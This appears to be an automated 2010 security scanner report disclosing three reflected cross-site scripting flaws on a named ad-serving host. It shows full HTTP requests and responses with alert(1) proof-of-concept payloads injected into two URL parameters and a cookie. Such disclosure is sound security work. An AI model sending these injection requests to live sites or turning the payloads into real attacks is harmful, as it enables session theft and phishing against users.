Bounty Hunting: NO BUGS = NO PAYMENT. Google Vulnerability Rewards Program as the example for payment terms and conditions.


Report generated by Hoyt LLC Research at Sun Oct 31 20:55:52 EDT 2010.


Cross Site Scripting Report for bs.serving-sys.com

1. Cross-site scripting (reflected)

Loading



1.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]

1.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]

1.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]



1. Cross-site scripting (reflected)
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [h parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the h request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b848b%3balert(1)//9cf44d25d0a was submitted in the h parameter. This input was echoed as b848b;alert(1)//9cf44d25d0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1862555&PluID=0&w=728&h=90b848b%3balert(1)//9cf44d25d0a&ord=mocgfA,bgmIKnslwmuK&ucm=true&ncu=$$http://dm.travelocity.com/event.ng/Type=click&FlightID=106010&AdID=142968&TargetID=16326&ASeg=&AMod=&AOpt=0&Segments=1,9,3364,3514,3614,4301,4302,4719,5797,6125,10379,10495,10780,10787,11148,11465,12670,13331,15011,15413,15618,16146,16916,17664,18014,18089,18157,18289,18455,18461,18516,18540,18541,18543,18569,18598,18626&Targets=5907,13593,8706,9683,27335,28342,26923,23135,24316,27014,27541,27663,27657,27661,27700,16326,16211,16330&Values=25,30,51,60,72,80,92,101,110,150,154,215,233,261,281,285,287,291,2176,2218,2246,2297,2305,2306,2307,2308,2317,2340,2342,2343,2359,2432,2502,3333,4760,6472,6474,6509,6733,7012,8257,8512,8989,9080,9118,9744,9845,9846,11162&RawValues=&Redirect=$$&z=0 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=package&paxa=2&paxs=0&paxc=0&air_seg=1&car_seg=0&hot_seg=1&cruise_seg=0&random=185583&tile=252682244925935&section=details
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response



HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: CP="NOI DEVa OUR BUS UNI"
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=eEn39Ir+07ft0000820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=76Kr0820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uyK820wrA0000001_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uyK005D820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=07ft820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=0367e1d9-da22-4de9-8eb2-1189dff835643F1050; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=0367e1d9-da22-4de9-8eb2-1189dff835643F1050; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 2430

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
ig,ebRand).replace(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,3835331).replace(/\[%tp_flightid%\]/ig,1862555).replace(/\[%tp_campaignid%\]/ig,125102);}var ebO = new Object();ebO.w=728;ebO.h=90b848b;alert(1)//9cf44d25d0a;ebO.ai=3835331;ebO.pi=0;ebO.d=0;ebO.rnd=40482798785020152;ebO.title="";ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResource
...[SNIP]...

1.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs [w parameter]  previous  next

Summary



Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail



The value of the w request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 899bd%3balert(1)//8a126966a51 was submitted in the w parameter. This input was echoed as 899bd;alert(1)//8a126966a51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail



Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request



GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1862555&PluID=0&w=728899bd%3balert(1)//8a126966a51&h=90&ord=mocgfA,bgmIKnslwmuK&ucm=true&ncu=$$http://dm.travelocity.com/event.ng/Type=click&FlightID=106010&AdID=142968&TargetID=16326&ASeg=&AMod=&AOpt=0&Segments=1,9,3364,3514,3614,4301,4302,4719,5797,6125,10379,10495,10780,10787,11148,11465,12670,13331,15011,15413,15618,16146,16916,17664,18014,18089,18157,18289,18455,18461,18516,18540,18541,18543,18569,18598,18626&Targets=5907,13593,8706,9683,27335,28342,26923,23135,24316,27014,27541,27663,27657,27661,27700,16326,16211,16330&Values=25,30,51,60,72,80,92,101,110,150,154,215,233,261,281,285,287,291,2176,2218,2246,2297,2305,2306,2307,2308,2317,2340,2342,2343,2359,2432,2502,3333,4760,6472,6474,6509,6733,7012,8257,8512,8989,9080,9118,9744,9845,9846,11162&RawValues=&Redirect=$$&z=0 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=package&paxa=2&paxs=0&paxc=0&air_seg=1&car_seg=0&hot_seg=1&cruise_seg=0&random=185583&tile=252682244925935&section=details
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response



HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: CP="NOI DEVa OUR BUS UNI"
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=eEn29IrZ07ft0000820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=76Kr0820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uyK820wrA0000001_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uyK005D820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=07ft820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=cde36ee6-38f7-46c7-bc2f-5fab171510ee3F1070; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=cde36ee6-38f7-46c7-bc2f-5fab171510ee3F1070; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 2430

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
Random\]/ig,ebRand).replace(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,3835330).replace(/\[%tp_flightid%\]/ig,1862555).replace(/\[%tp_campaignid%\]/ig,125102);}var ebO = new Object();ebO.w=728899bd;alert(1)//8a126966a51;ebO.h=90;ebO.ai=3835330;ebO.pi=0;ebO.d=0;ebO.rnd=40482798507017396;ebO.title="";ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(e
...[SNIP]...

1.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous

Summary



Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail



The value of the eyeblaster cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f0743%3balert(1)//d484c831d05 was submitted in the eyeblaster cookie. This input was echoed as f0743;alert(1)//d484c831d05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail



Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request



GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1733391&PluID=0&w=728&h=90&ord=mocqbo,bgmIKnIlwmxg&ncu=$$http://dm.travelocity.com/event.ng/Type=click&FlightID=100258&AdID=137666&TargetID=16326&ASeg=&AMod=&AOpt=0&Segments=1,9,3364,3514,3614,4301,4302,4719,5797,6125,10379,10495,10780,10787,11148,11465,12670,13331,15011,15413,15618,16146,16916,17664,18014,18089,18157,18289,18455,18461,18516,18540,18541,18543,18569,18598,18626&Targets=5907,13593,8706,9683,27335,28342,26923,23135,24316,27014,27541,27663,27657,27661,27700,16326,16211,16330&Values=25,30,51,60,72,80,92,101,110,150,154,215,233,261,281,285,287,291,2176,2218,2246,2297,2305,2306,2307,2308,2317,2340,2342,2343,2359,2432,2502,3333,4760,6472,6474,6509,6733,7012,8257,8512,8989,9080,9118,9744,9845,9846,11162&RawValues=&Redirect=$$&z=0 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=package&paxa=2&paxs=0&paxc=0&air_seg=1&car_seg=0&hot_seg=1&cruise_seg=0&random=198249&tile=219980827465671&section=details
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=f0743%3balert(1)//d484c831d05; A2=eEn29IrT07ft0000820wrA; B2=76Kr0820wrA; C3=0uyK820wrA0000001_; D3=0uyK005D820wrA; E2=07ft820wrA; u2=a471c162-f9b4-4640-82eb-21e69471e0c43F1020; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Connection: close
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
P3P: CP="NOI DEVa OUR BUS UNI"
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=f0743;alert(1)//d484c831d05; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=eEn29IrS07ft0000820wrAdr1f9Is407ft0000820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=76Kr0820wrA6Dcf0820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0t8k820wrA0000200_0uyK820wrA0000001_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0t8k005D820wrA0uyK005D820wrA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=07ftg410rA; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=a471c162-f9b4-4640-82eb-21e69471e0c43F102g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Vary: Accept-Encoding
Content-Length: 2565

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,3518543).replace(/\[%tp_flightid%\]/ig,1733391).replace(/\[%tp_campaignid%\]/ig,119316);}var ebO = new Object();ebO.w=728;ebO.h=90;ebO.ai=3518543;ebO.pi=0;ebO.d=f0743;alert(1)//d484c831d05;ebO.rnd=40482803056027478;ebO.title="";ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-
...[SNIP]...

Report generated by Hoyt LLC Research at Sun Oct 31 20:55:52 EDT 2010.